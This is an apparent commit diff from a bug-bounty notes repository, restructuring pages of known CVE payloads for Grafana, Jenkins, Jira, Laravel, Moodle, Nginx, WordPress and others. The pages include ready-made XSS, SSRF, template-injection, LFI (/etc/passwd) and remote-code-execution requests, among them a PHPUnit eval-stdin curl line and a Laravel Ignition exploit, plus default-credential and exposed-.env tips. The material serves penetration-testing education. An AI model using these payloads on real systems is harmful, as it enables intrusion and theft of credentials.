STRLCPY/AllAboutBugBounty

■ ■ ■ ■ ■ ■

Technologies/Grafana.md

1	1		# Grafana
2	2		1. CVE-2021-41174 (Reflected XSS)
3	3		```
4		-	<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
	4	+	https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
5	5		```
6	6		2. CVE-2020-13379 (Denial of Service)
7	7		```
8		-	<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
	8	+	https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
9	9		```
10	10		3. CVE-2020-11110 (Stored XSS)
11	11		```
12	12		POST /api/snapshots HTTP/1.1
13		-	Host: <GRAFANA URL>
	13	+	Host: example.com
14	14		Accept: application/json, text/plain, /
15	15		Accept-Language: en-US,en;q=0.5
16	16		Referer: {{BaseURL}}
		skipped 5 lines
22	22		4. CVE-2019-15043 (Grafana Unauthenticated API)
23	23		```
24	24		POST /api/snapshots HTTP/1.1
25		-	Host: <GRAFANA URL>
	25	+	Host: example.com
26	26		Connection: close
27	27		Content-Length: 235
28	28		Accept: /
		skipped 8 lines
37	37		```
38	38		6. Signup Enabled
39	39		```
40		-	<GRAFANA URL>/signup
	40	+	https://example.com/signup
41	41		```

■ ■ ■ ■ ■ ■

Technologies/HAProxy.md

1		-	# HAProxy
	1	+	# HAProxy Common Bugs
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses HAProxy?
	5	+
	6	+	## How to Detect
	7	+	-
	8	+
2	9		1. CVE-2021-40346 (HTTP Request Smuggling)
3	10		```
4	11		POST /index.html HTTP/1.1
		skipped 11 lines

■ ■ ■ ■ ■ ■

Technologies/Jenkins.md

1		-	## Jenkins
2		-	1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
	1	+	# Jenkins Common Bugs
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Jenkins?
	5	+
	6	+	## How to Detect
	7	+	Usually in the HTTP response there is a header like this `X-Jenkins`
	8	+
	9	+	1. Find the related CVE by checking jenkins version
	10	+	* How to find the jenkins version
	11	+
	12	+	By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
	13	+
	14	+	Some example CVE:
	15	+	- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
3	16
4	17		Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
5	18		Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
		skipped 3 lines
9	22		./jenkins_rce.py jenkins_ip jenkins_port payload.out
10	23		```
11	24
12		-	2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
	25	+	- Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
13	26
14	27		Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
15	28
		skipped 2 lines
18	31		curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
19	32		```
20	33
21		-	3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
22		-
23		-	Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
24		-
25	34		Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
26	35
27		-	4. CVE-2019-1003030
	36	+	- CheckScript RCE in Jenkins (CVE-2019-1003030)
28	37
29	38		How to Exploit:
30	39		- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
		skipped 25 lines
56	65
57	66		%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
58	67
59		-	5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
	68	+	2. Default Credentials
	69	+	```
	70	+	Try to login using admin as username and password
	71	+	```
60	72
61		-	How to exploit:
62		-	- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
63		-	- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
	73	+	3. Unauthenticated Jenkins Dashboard
	74	+	```
	75	+	Access https://target.com and if there is no login form then it is vulnerable
	76	+	```
64	77
65		-	Reference:
66		-	- https://github.com/gquere/pwn_jenkins
	78	+	## Reference
	79	+	* [pwn_jenkins](https://github.com/gquere/pwn_jenkins)

■ ■ ■ ■ ■ ■

Technologies/Jira.md

1		-	# Unauthenticated Jira CVEs
2		-	1. CVE-2017-9506 (SSRF)
	1	+	# Jira Common Bugs
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Jira?
	5	+
	6	+	## How to Detect
3	7		```
4		-	https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
	8	+	https://example.com/secure/Dashboard.jspa
	9	+	https://example.com/login.jsp
5	10		```
6		-	2. CVE-2018-20824 (XSS)
	11	+
	12	+	1. Find the related CVE by checking jira version
	13	+	* How to find the jira version
	14	+
	15	+	Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
	16	+
	17	+	Some example CVE:
	18	+
	19	+	- CVE-2017-9506 (SSRF)
7	20		```
8		-	https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
	21	+	https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
9	22		```
10		-	3. CVE-2019-8451 (SSRF)
	23	+	- CVE-2018-20824 (XSS)
11	24		```
12		-	https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:[email protected]
	25	+	https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
13	26		```
14		-	4. CVE-2019-8449 (User Information Disclosure)
	27	+	- CVE-2019-8451 (SSRF)
15	28		```
16		-	https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
	29	+	https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:[email protected]
17	30		```
18		-	5. CVE-2019-8442 (Sensitive Information Disclosure)
	31	+	- CVE-2019-8449 (User Information Disclosure)
19	32		```
20		-	https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
	33	+	https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
21	34		```
22		-	6. CVE-2019-3403 (User Enumeration)
	35	+	- CVE-2019-8442 (Sensitive Information Disclosure)
23	36		```
24		-	https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
	37	+	https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
25	38		```
26		-	7. CVE-2020-14181 (User Enumeration)
	39	+	- CVE-2019-3403 (User Enumeration)
27	40		```
28		-	https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
	41	+	https://example.com/rest/api/2/user/picker?query=<USERNAME_HERE>
29	42		```
30		-	8. CVE-2020-14178 (Project Key Enumeration)
	43	+	- CVE-2020-14181 (User Enumeration)
31	44		```
32		-	https://<JIRA_URL>/browse.<PROJECT_KEY>
	45	+	https://example.com/secure/ViewUserHover.jspa?username=<USERNAME>
33	46		```
34		-	9. CVE-2020-14179 (Information Disclosure)
	47	+	- CVE-2020-14178 (Project Key Enumeration)
35	48		```
36		-	https://<JIRA_URL>/secure/QueryComponent!Default.jspa
	49	+	https://example.com/browse.<PROJECT_KEY>
37	50		```
38		-	10. CVE-2019-11581 (Template Injection)
	51	+	- CVE-2020-14179 (Information Disclosure)
39	52		```
40		-	<JIRA_URL>/secure/ContactAdministrators!default.jspa
	53	+	https://example.com/secure/QueryComponent!Default.jspa
	54	+	```
	55	+	- CVE-2019-11581 (Template Injection)
	56	+	```
	57	+	example.com/secure/ContactAdministrators!default.jspa
41	58
42	59		* Try the SSTI Payloads
43	60		```
44	61
45		-	11. CVE-2019-3396 (Path Traversal)
	62	+	- CVE-2019-3396 (Path Traversal)
46	63		```
47	64		POST /rest/tinymce/1/macro/preview HTTP/1.1
48	65		Host: {{Hostname}}
		skipped 7 lines
56	73
57	74		*Try above request with the Jira target
58	75		```
59		-	12. CVE-2019-3402 (XSS)
	76	+	- CVE-2019-3402 (XSS)
	77	+	```
	78	+	https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
60	79		```
61		-	https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
	80	+
	81	+	2. Signup enabled
	82	+	```
	83	+	POST /servicedesk/customer/user/signup HTTP/1.1
	84	+	Host: example.com
	85	+	Content-Type: application/json
	86	+
	87	+	{"email":"[email protected]","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
62	88		```
63	89
64		-	Reference:
65		-	- https://twitter.com/harshbothra
	90	+	## Reference
	91	+	* [@harshbothra](https://twitter.com/harshbothra)

■ ■ ■ ■ ■ ■

Technologies/Laravel.md

1		-	# Common bug in laravel framework
2		-	1. Laravel PHPUnit Remote Code Execution
3		-	* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
4		-	* Affected versions : Before 4.8.28 and 5.x before 5.6.3
	1	+	# Laravel Common Bugs
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Laravel?
	5	+
	6	+	## How to Detect
	7	+	Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=`
	8	+
	9	+	1. Find the related CVE by checking laravel version
	10	+	* How to find the laravel version
	11	+
	12	+	By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html)
	13	+
	14	+	Some example CVE:
5	15
6		-	Command
	16	+	- CVE-2021-3129 (Remote Code Execution)
7	17		```
8		-	curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
	18	+	POST /_ignition/execute-solution HTTP/1.1
	19	+	Host: example.com
	20	+	Accept: application/json
	21	+	Content-Type: application/json
	22	+
	23	+	{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be\|convert.quoted-printable-encode\|convert.iconv.utf-16be.utf-8\|convert.base64-decode/resource=../storage/logs/laravel.log"}}
	24	+	```
	25	+
	26	+	2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)
	27	+	```
	28	+	curl -d "<?php echo php_uname(); ?>" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
9	29		```
10	30
11		-	2. Exposed environment variables
12		-	* Full Path Exploit : http://target.com/.env
	31	+	3. Exposed environment variables
	32	+	* Full Path Exploit : http://example.com/.env
13	33
14	34		![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
15	35
16		-	3. Exposed log files
17		-	* Full Path Exploit : http://target.com/storage/logs/laravel.log
	36	+	4. Exposed log files
	37	+	* Full Path Exploit : http://example.com/storage/logs/laravel.log
18	38
19		-	4. Laravel Debug Mode Enabled
20		-	* Using SQL injection query in GET or POST method
21		-	* Try path /logout (ex:target.com/logout)
22		-	* Using [] in paramater (ex:target.com/param[]=0)
	39	+	5. Laravel Debug Mode Enabled
	40	+	* Try to request to https://example.com using POST method (Error 405)
	41	+	* Using [] in paramater (ex:example.com/param[]=0)
23	42
24	43		![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
25	44
26		-	Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
	45	+	## References
	46	+	* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)
27	47

■ ■ ■ ■ ■ ■

Technologies/Moodle.md

1		-	# Moodle
	1	+	# Moodle Common Bugs
	2	+
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Moodle?
	5	+
	6	+	## How to Detect
	7	+	If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
2	8
3	9		1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
4	10		```
		skipped 3 lines
8	14		2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
9	15
10	16		```
11		-	https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
	17	+	https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
	18	+	```
	19	+
	20	+	3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
	21	+
	22	+	```
	23	+	https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
12	24		```

■ ■ ■ ■ ■ ■

Technologies/Nginx.md

1		-	# Nginx
	1	+	# Nginx Common Bugs
2	2
3		-	1. Directory traversal
	3	+	## Introduction
	4	+	What would you do if you came across a website that uses Nginx?
	5	+
	6	+	## How to Detect
	7	+	Usually in the HTTP response there is a header like this `Server: nginx`
	8	+
	9	+	1. Find the related CVE by checking nginx version
	10	+	* How to find the nginx version
	11	+
	12	+	By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated nginx version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-315/product_id-101578/F5-Nginx.html)
	13	+
	14	+	2. Directory traversal
4	15		```
5	16		https://example.com/folder1../folder1/folder2/static/main.css
6	17		https://example.com/folder1../%s/folder2/static/main.css
		skipped 2 lines
9	20		https://example.com/folder1/folder2/static../static/main.css
10	21		https://example.com/folder1/folder2/static../%s/main.css
11	22		```
	23	+
	24	+	3. Nginx status page
	25	+	```
	26	+	https://example.com/nginx_status
	27	+	```

■ ■ ■ ■ ■ ■

Technologies/WordPress.md

		skipped 2 lines
3	3		## Introduction
4	4		What would you do if you came across a website that uses WordPress?
5	5
	6	+	## How to Detect
	7	+	If you visit `https://target.com` and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit `https://target.com/wp-login.php`, it is the WordPress login admin page
	8	+
6	9		1. Find the related CVE by checking the core, plugins, and theme version
7	10		* How to find the wordpress version
8	11		```
		skipped 91 lines
100	103		</methodCall>
101	104		```
102	105
	106	+	7. Register enabled
	107	+	```
	108	+	http://example.com/wp-login.php?action=register
	109	+	```

■ ■ ■ ■ ■ ■

Technologies/Zend.md

1		-	# Common bug in Zend framework
	1	+	# Zend Common Bugs
2	2
3	3		## Introduction
4	4		What would you do if you came across a website that uses Zend?
5	5
6	6		## How to Detect
7		-
	7	+	-
8	8
9	9		1. Finding config files
10	10		```
		skipped 3 lines

Adding some 'technology' information